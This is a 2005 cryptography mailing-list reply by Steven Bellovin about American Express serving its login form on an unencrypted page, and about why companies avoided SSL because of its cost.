[17412] in cryptography@c2.net mail archive
Re: AmEx unprotected login site
daemon@ATHENA.MIT.EDU (Steven M. Bellovin)
Wed Jun 8 21:26:17 2005
X-Original-To: cryptography@metzdowd.com
X-Original-To: cryptography@metzdowd.com
From: "Steven M. Bellovin" <smb@cs.columbia.edu>
To: "Perry E. Metzger" <perry@piermont.com>
Cc: Jerrold Leichter <jerrold.leichter@smarts.com>,
Amir Herzberg <herzbea@macs.biu.ac.il>, cryptography@metzdowd.com
In-Reply-To: Your message of "Wed, 08 Jun 2005 15:16:29 EDT."
<87acm0hd6a.fsf@snark.piermont.com>
Date: Wed, 08 Jun 2005 18:07:17 -0400
In message <87acm0hd6a.fsf@snark.piermont.com>, "Perry E. Metzger" writes:
>
>Jerrold Leichter <jerrold.leichter@smarts.com> writes:
>> If you look at their site now, they *claim* to have fixed it: The login box
>
>> has a little lock symbol on it. Click on that, and you get a pop-up window
>> discussing the security of the page. It says that although the page itself
>> isn't protected, "your information is transmitted via a secure environment".
>>
>> No clue as to what exactly they are doing, hence if it really is secure.
>
>They're still doing the wrong thing. Unless the page was transmitted
>to you securely, you have no way to trust that your username and
>password are going to them and not to someone who cleverly sent you an
>altered version of the page.
>
They're doing the wrong thing, and probably feel they have no choice.
Setting up an SSL session is expensive; most people who go to their
home page do not log in, and hence do not (to Amex) require
cryptographic protection.
A few years ago, I talked with someone who was setting up a system that
really needed security. Given how few pages people would visit on the
site, though, he estimated that it would increase his costs by a factor
of about 15. (I didn't verify the numbers; I know from experience that
he's competent and has his hear in the right place re security).
--Steven M. Bellovin, http://www.cs.columbia.edu/~smb
---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo@metzdowd.com
